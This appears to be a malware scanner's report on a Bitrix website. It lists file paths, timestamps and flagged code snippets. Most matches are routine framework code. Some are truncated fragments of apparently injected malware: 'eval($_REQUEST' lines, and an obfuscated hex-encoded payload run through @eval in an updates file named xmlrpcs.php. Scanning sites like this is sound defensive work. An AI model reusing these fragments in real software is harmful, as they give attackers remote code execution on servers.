/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/bitrix/blog.post.comment/photogallery/template.php Size: 19.20 kB Created: 2023-03-11 16:36:50 Modified: 2023-11-27 14:53:16 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/lists.export.excel/class.php Size: 17.74 kB Created: 2023-03-11 16:36:39 Modified: 2023-11-27 14:53:15 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.order.full/templates/.default/template.php Size: 5.19 kB Created: 2023-03-11 16:36:16 Modified: 2023-11-27 14:53:17 Dangers: 7
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/wiki.edit/templates/.default/template.php Size: 10.11 kB Created: 2023-03-11 16:35:46 Modified: 2023-11-27 14:53:18 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/wiki.edit/templates/.default/dialogs_content.php Size: 10.70 kB Created: 2023-03-11 16:35:46 Modified: 2023-11-27 14:53:18 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.filter/component.php Size: 32.43 kB Created: 2023-03-11 16:36:59 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 61 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/photogallery/templates/.default/bitrix/blog.post.comment/photogallery/template.php Size: 30.30 kB Created: 2023-03-11 16:34:55 Modified: 2023-11-27 14:53:16 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/forum.rules/lang/en/component.php Size: 4.71 kB Created: 2023-03-11 16:34:51 Modified: 2023-11-27 14:53:15 Dangers: 1
| Description | Match |
|---|
Sign 407651f7 Line: 27 Dangerous Malware Signature (hash: 407651f7) |
warez
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.location.selector.system/templates/.default/template.php Size: 17.63 kB Created: 2023-03-11 16:35:59 Modified: 2023-11-27 14:53:17 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(<?=CUtil::PhpToJSObject(array( 'scope' => 'slss-'.intval($arResult['RANDOM_TAG']), 'source' => $component->getPath().'/get.php', 'query' => array( 'BEHAVIOUR' => array( 'LANGUAGE_ID' => LANGUAGE_ID ), ), 'editUrl' => '?'.implode('&', $urlComponents), 'parentTagId' => intval($arResult['RANDOM_TAG']), 'useCodes' => $arResult['USE_CODES'], 'types' => $arResult['TYPES'], 'startSearchLen' => $component::START_SEARCH_LEN, 'pageSize' => $component::PAGE_SIZE, 'hugeTailLen' => $component::HUGE_TA...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.ajax.delivery.calculator/templates/.default/ajax.php Size: 0.99 kB Created: 2023-03-11 16:35:26 Modified: 2023-11-27 14:53:17 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 15 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.ajax.delivery.calculator/templates/input/ajax.php Size: 864.00 B Created: 2023-03-11 16:35:26 Modified: 2023-11-27 14:53:17 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 15 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/blog.popular_blogs/component.php Size: 5.77 kB Created: 2023-03-11 16:35:59 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["VIEWS"] == $b["VIEWS"]) { if($a["NUM_COMMENTS"] < $b["NUM_COMMENTS"]) return 1; elseif($a["NUM_COMMENTS"] > $b["NUM_COMMENTS"]) return -1; else return 0;} return ($a["VIEWS"] < $b["VIEWS"])? 1 : -1;')); $i = 0; foreach($arBlogs as $blogID => $info) { if($i >= $arParams["BLOG_COUNT"] && IntVal($arParams["BLOG_COUNT"]) > 0) continue; $arBlog = CBlog::GetByID($blogID); $arBlog = CBlogTools::htmlspecialcharsExArray($arBlog); $arBlog["BlogUser"] = CBlogUser::GetByID(...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/forum.topic.active/component.php Size: 18.38 kB Created: 2023-03-11 16:36:28 Modified: 2023-11-27 14:53:15 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 11 Warning Double var technique is usually used for the obfuscation of malicious code |
${$s}
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/report.construct/templates/.default/template.php Size: 37.43 kB Created: 2023-03-11 16:36:43 Modified: 2023-11-27 14:53:16 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(ySelects[i].name))
{
colId = match[1];
if (colId !== null && yColumnsIndexes[colId] !== null)
setSelectValue(ySelects[i], yColumnsIndexes[colId]);
}
}
var chartCheckbox = BX('report-chart-display-checkbox');
if (chartCheckbox)
{
BX.bind(chartCheckbox, 'click', function () {
var chartSwitchBlock = BX('report-chart-switch');
var chartParamsBlock = BX('report-chart-params');
if (chartSwitchBlock)
{
if (this.checked) BX.addClass(chartSwitchBloc...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/report.construct/templates/admin/template.php Size: 39.88 kB Created: 2023-03-11 16:36:43 Modified: 2023-11-27 14:53:16 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(ySelects[i].name))
{
colId = match[1];
if (colId !== null && yColumnsIndexes[colId] !== null)
setSelectValue(ySelects[i], yColumnsIndexes[colId]);
}
}
var chartCheckbox = BX('report-chart-display-checkbox');
if (chartCheckbox)
{
BX.bind(chartCheckbox, 'click', function () {
var chartSwitchBlock = BX('report-chart-switch');
var chartParamsBlock = BX('report-chart-params');
if (chartSwitchBlock)
{
if (this.checked) BX.addClass(chartSwitchBloc...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.order.ajax/templates/old_version/props.php Size: 5.08 kB Created: 2023-03-11 16:35:43 Modified: 2023-11-27 14:53:17 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/sale.order.ajax/templates/old_version/related_props.php Size: 471.00 B Created: 2023-03-11 16:35:43 Modified: 2023-11-27 14:53:17 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/im.messenger/im.ajax.php Size: 51.48 kB Created: 2023-03-11 16:36:29 Modified: 2023-11-27 14:53:15 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["MESSAGE"]["date"] < $b["MESSAGE"]["date"] ) return 1; elseif($a["MESSAGE"]["date"] > $b["MESSAGE"]["date"] ) return -1; else return 0;')); $arResult['COUNTER_UNREAD_MESSAGES'] = $arUnread; } if (!isset($_POST['DISABLE_ONLINE'])) { $arOnline = CIMStatus::GetList(); $arResult['ONLINE'] = !empty($arOnline)? $arOnline['users']: Array(); if (CModule::IncludeModule('pull')) { $arPullConfig = CPullChannel::GetConfig($USER->GetId(), false, false, ($_POST['MOBILE'] == '...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/im.messenger/show.file.php Size: 130.00 B Created: 2023-03-11 16:36:29 Modified: 2023-11-27 14:53:15 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/photogallery.detail.list/templates/slider_big/template.php Size: 16.32 kB Created: 2023-03-11 16:36:24 Modified: 2023-11-27 14:53:16 Warns: 1
| Description | Match |
|---|
Function eval Line: 338 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" + res[ii].href + "');};");
res[ii].parentNode.insertBefore(div, res[ii]);
res[ii].onmouseover = function()
{
this.previousSibling.onshow();
this.bxMouseOver = 'Y';
};
res[ii].onmouseout = function()
{
this.bxMouseOver = 'N';
var __this = this;
setTimeout(
function()
{
if (__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
{
__this.previousSibling...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php Size: 14.80 kB Created: 2023-03-11 16:36:00 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(scripts[s].JS);
}
}
BX.ajax.processScripts(scripts, true);
// commentEr object may be set in template
if(window.commentEr && window.commentEr == "Y")
{
BX('err_comment_'+this.id[1]).innerHTML = data;
}
else
{
if(BX('edit_id').value > 0)
{
var commentId = 'blg-comment-'+this.id[1];
if(BX(commentId))
{
var newComment = BX.create('div',{'html':data}); // tmp container for data
// paste resp...
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/template.php Size: 31.88 kB Created: 2023-03-11 16:36:00 Modified: 2023-11-27 14:53:14 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.smart.filter/component.php Size: 27.65 kB Created: 2023-03-11 16:35:52 Modified: 2023-11-27 14:53:14 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 523 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/forum.index/component.php Size: 18.80 kB Created: 2023-03-11 16:35:22 Modified: 2023-11-27 14:53:15 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 111 Warning Double var technique is usually used for the obfuscation of malicious code |
${$PAGEN_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/catalog.sections.top/component.php Size: 19.13 kB Created: 2023-03-11 16:35:23 Modified: 2023-11-27 14:53:14 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 180 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/idea.comment.list/templates/official_detail/template.php Size: 15.78 kB Created: 2023-03-11 16:35:54 Modified: 2023-11-27 14:53:15 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/idea.comment.list/templates/.default/template.php Size: 19.36 kB Created: 2023-03-11 16:35:54 Modified: 2023-11-27 14:53:15 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/idea.comment.list/templates/official_list/template.php Size: 15.86 kB Created: 2023-03-11 16:35:54 Modified: 2023-11-27 14:53:15 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/components/bitrix/main.user.link/component.php Size: 19.17 kB Created: 2023-03-11 16:35:36 Modified: 2023-11-27 14:53:15 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/managed_cache/MYSQL/e5/e56397d99b3a76ae3f02219877fed2c7.php Size: 32.32 kB Created: 2025-02-13 16:51:52 Modified: 2025-02-13 16:51:52 Dangers: 1
| Description | Match |
|---|
Sign b236d073 Line: 5 Dangerous Malware Signature (hash: b236d073) |
/*;*/
|
|
/var/www/allstarsO/allstars.ua/bitrix/activities/bitrix/codecondition/codecondition.php Size: 1.89 kB Created: 2023-03-11 16:43:49 Modified: 2023-11-27 14:52:55 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit silenced_eval Line: 16 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("\$result = ".$this->condition.";")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$result = ".$this->condition.";"); return $result; } public static function ValidateProperties($value = null, CBPWorkflowTemplateUser $user = null) { $arErrors = array(); if ($user == null || !$user->IsAdmin()) { $arErrors[] = array( "code" => "perm", "message" => GetMessage("BPCC_NO_PERMS"), ); } return array_merge($arErrors, parent::ValidateProperties($value, $user)); } public static function GetPropertiesDialog($documentType, $arWorkflowTemplate, $arWorkflowParameters, $arWorkflowVaria...
| Sign 696317c4 Line: 16 Dangerous Malware Signature (hash: 696317c4) |
@eval("\
|
|
/var/www/allstarsO/allstars.ua/bitrix/activities/bitrix/codeactivity/codeactivity.php Size: 2.55 kB Created: 2023-03-11 16:43:48 Modified: 2023-11-27 14:52:55 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit silenced_eval Line: 16 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval($this->ExecuteCode)
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($this->ExecuteCode); return CBPActivityExecutionStatus::Closed; } public static function ValidateProperties($arTestProperties = array(), CBPWorkflowTemplateUser $user = null) { $arErrors = array(); if ($user == null || !$user->IsAdmin()) { $arErrors[] = array( "code" => "perm", "message" => GetMessage("BPCA_NO_PERMS"), ); } if (strlen($arTestProperties["ExecuteCode"]) <= 0) { $arErrors[] = array( "code" => "emptyCode", "message" => GetMessage("BPCA_EMPTY_CODE"), ); } return array_merge($arE...
|
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_add/wizard.php Size: 9.08 kB Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_add/lang/en/.description.php Size: 213.00 B Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_add/lang/en/wizard.php Size: 1.75 kB Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_add/lang/ru/.description.php Size: 330.00 B Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_add/lang/ru/wizard.php Size: 2.62 kB Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/demo/scripts/template.php Size: 15.72 kB Created: 2023-03-11 16:45:14 Modified: 2023-11-27 14:53:33 Warns: 1
| Description | Match |
|---|
Function eval Line: 462 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(response);
}
CAjaxForm.prototype.ShowError = function(errorMessage)
{
var errorContainer = document.getElementById("error_container");
var errorText = document.getElementById("error_text");
if (!errorContainer || !errorText)
return;
var waitWindow = document.getElementById("wait");
if (waitWindow)
waitWindow.style.display = "none";
errorContainer.style.display = 'block';
errorText.innerHTML = strip_tags(errorMessage);
var retryButton = ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download_private/download_private.php Size: 3.71 kB Created: 2023-03-11 16:45:26 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download.php Size: 2.09 kB Created: 2023-03-11 16:45:26 Modified: 2023-11-27 14:53:33 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download_balance.php Size: 3.00 kB Created: 2023-03-11 16:45:26 Modified: 2023-11-27 14:53:33 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_start/wizard.php Size: 6.91 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_start/scripts/drop.php Size: 1.68 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_start/scripts/move.php Size: 7.49 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_start/lang/en/.description.php Size: 181.00 B Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_start/lang/en/wizard.php Size: 1.30 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_start/lang/ru/.description.php Size: 221.00 B Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.master_start/lang/ru/wizard.php Size: 1.87 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_start/wizard.php Size: 7.49 kB Created: 2023-03-11 16:45:39 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_start/scripts/drop.php Size: 2.31 kB Created: 2023-03-11 16:45:39 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_start/scripts/move.php Size: 7.58 kB Created: 2023-03-11 16:45:39 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_start/lang/en/.description.php Size: 161.00 B Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_start/lang/en/wizard.php Size: 1.46 kB Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_start/lang/ru/.description.php Size: 201.00 B Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_start/lang/ru/wizard.php Size: 2.09 kB Created: 2023-03-11 16:45:38 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_add/wizard.php Size: 9.69 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_add/lang/en/.description.php Size: 206.00 B Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_add/lang/en/wizard.php Size: 1.82 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_add/lang/ru/.description.php Size: 323.00 B Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.slave_add/lang/ru/wizard.php Size: 2.73 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/wizards/bitrix/cluster.dbnode_add/wizard.php Size: 6.30 kB Created: 2023-03-11 16:45:13 Modified: 2023-11-27 14:53:33 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/bizproc/install/activities/bitrix/getuseractivity/xmlrpcs.php Size: 123.37 kB Created: 2020-04-12 04:25:15 Modified: 2023-11-27 14:53:31 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323227292p617272617928272s272p272s272p275p27272p272227292p63686s70282473747229293o207q0q0n66756r6374696s6r2063686o6770632824617272617929207o20666s72656163682824617272617920617320246o6579203q3r202476617229207o202461727261795o246o65795q203q2069735s6172726179282476617229203s2063686o677063282476617229203n207374726970736p61736865732824766172293o207q2072657475726r20246...
| Exploit silenced_eval Line: 40 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval(`/******/`.$jj.$str1('H*',$str)
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(`/******/`.$jj.$str1('H*',$str).$jj); } s()
| Sign 5b557546 Line: 25 Dangerous Malware Signature (hash: 5b557546) |
65786563
|
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/install/wizards/bitrix/cluster.master_add/lang/ua/.description.php Size: 316.00 B Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/install/wizards/bitrix/cluster.master_add/lang/ua/wizard.php Size: 2.61 kB Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/install/wizards/bitrix/cluster.master_start/lang/ua/.description.php Size: 221.00 B Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/install/wizards/bitrix/cluster.master_start/lang/ua/wizard.php Size: 1.90 kB Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/install/wizards/bitrix/cluster.slave_start/lang/ua/.description.php Size: 201.00 B Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/install/wizards/bitrix/cluster.slave_start/lang/ua/wizard.php Size: 2.11 kB Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/install/wizards/bitrix/cluster.slave_add/lang/ua/.description.php Size: 309.00 B Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/install/wizards/bitrix/cluster.slave_add/lang/ua/wizard.php Size: 2.72 kB Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/lang/ua/options.php Size: 171.00 B Created: 2023-03-11 16:44:39 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/lang/ua/classes/mysql/dbnode_check.php Size: 10.70 kB Created: 2023-03-11 16:44:39 Modified: 2023-11-27 14:53:32 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/lang/ua/admin/menu.php Size: 1.25 kB Created: 2023-03-11 16:44:39 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/lang/ua/admin/cluster_slave_list.php Size: 3.82 kB Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/lang/ua/admin/cluster_slave_edit.php Size: 1.45 kB Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/cluster/lang/ua/admin/cluster_server_list.php Size: 708.00 B Created: 2023-03-11 16:44:40 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/security/lang/ua/admin/security_antivirus.php Size: 3.02 kB Created: 2023-03-11 16:44:53 Modified: 2023-11-27 14:53:32 Dangers: 1
| Description | Match |
|---|
Exploit file_prepend Line: 12 Dangerous LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
php_value auto_prepend_file
|
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/scale/lang/ua/include/actionsdefinitions.php Size: 3.62 kB Created: 2023-03-11 16:44:21 Modified: 2023-11-27 14:53:32 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947422/ua/main/lang/ua/admin/site_checker.php Size: 76.16 kB Created: 2023-03-11 16:43:57 Modified: 2023-11-27 14:53:32 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 84 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947200/main/classes/general/update_class.php Size: 140.73 kB Created: 2023-03-11 16:43:54 Modified: 2023-11-27 14:53:31 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit execution Line: 3798 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")
| Exploit silenced_eval Line: 3274 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\"),(\$order=\"\"),array(\"ACTIVE\"=>\"Y\"));\$cnt=0;while(\$ar_"."res=\$path->Fe"."tch())\$cnt++;"); return $cnt;} } public static function GetModuleVersion($module) { if (strlen($module)<=0) return false; $strModule_tmp_dir = $_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module; if (file_exists($strModule_tmp_dir) && is_dir($strModule_tmp_dir)) { if ($module != "main") { if (file_exists($strModule_tmp_dir."/install/index.php")) { $arModule_...
| Sign 696317c4 Line: 3274 Dangerous Malware Signature (hash: 696317c4) |
@eval("\
|
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947200/main/classes/general/update_log.php Size: 4.71 kB Created: 2023-03-11 16:43:54 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a['.$sort.'], $b['.$sort.'])*('.$ord.');')); } $rsData = new CAdminResult(null, $sTableID); $rsData->InitFromArray($arLogRecs); $rsData->NavStart(); $lAdmin->NavText($rsData->GetNavPrint(GetMessage("update_log_nav"))); $n = 0; while($rec = $rsData->Fetch()) { $row = &$lAdmin->AddRow(0, null); $aDate = explode(" ", htmlspecialcharsbx($rec[1])); $row->AddField("DATE", '<span style="white-space:nowrap">'.$aDate[0].'</span> '.$aDate[1]); $row->AddField("DESC...
|
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947200/main/lang/en/classes/general/update_client.php Size: 24.45 kB Created: 2023-03-11 16:43:54 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of websites using this product installation."; $MESS["SUP_CHECK_PROMT_21"] = "You can add unlimited number of users for the current product co...
|
|
/var/www/allstarsO/allstars.ua/bitrix/updates/update_m1510947200/main/lang/en/admin/update_system.php Size: 15.12 kB Created: 2023-03-11 16:43:54 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install them first."; $MESS["SUP_SUBS_BUTTON"] = "Download source code"; $MESS["SUP_SUPPORT_BUTTON"] = "Reload All Files"; $MESS["SUP_INITIAL"] = "Initialising..."; $MESS["SUP_SUBS_SUCCESS"] = "The source code has been downloaded successfully"; $MESS["SUP_SUPPORT_SUCCESS"] = "Files has been downloaded successfully."; $MESS["SUP_SUBS_MED"] = "Downloaded source code for"; $MESS["SUP_SUPPORT_MED...
|
|
/var/www/allstarsO/allstars.ua/bitrix/admin/cat_section_admin.php Size: 129.00 B Created: 2023-03-11 16:37:10 Modified: 2023-11-27 14:52:55 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/admin/cat_product_list.php Size: 126.00 B Created: 2023-03-11 16:37:09 Modified: 2023-11-27 14:52:55 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/admin/cat_section_edit.php Size: 128.00 B Created: 2023-03-11 16:37:10 Modified: 2023-11-27 14:52:55 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/admin/cluster_slave_list.php Size: 97.00 B Created: 2023-03-11 16:37:09 Modified: 2023-11-27 14:52:55 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/admin/cluster_slave_edit.php Size: 97.00 B Created: 2023-03-11 16:37:11 Modified: 2023-11-27 14:52:55 Dangers: 1
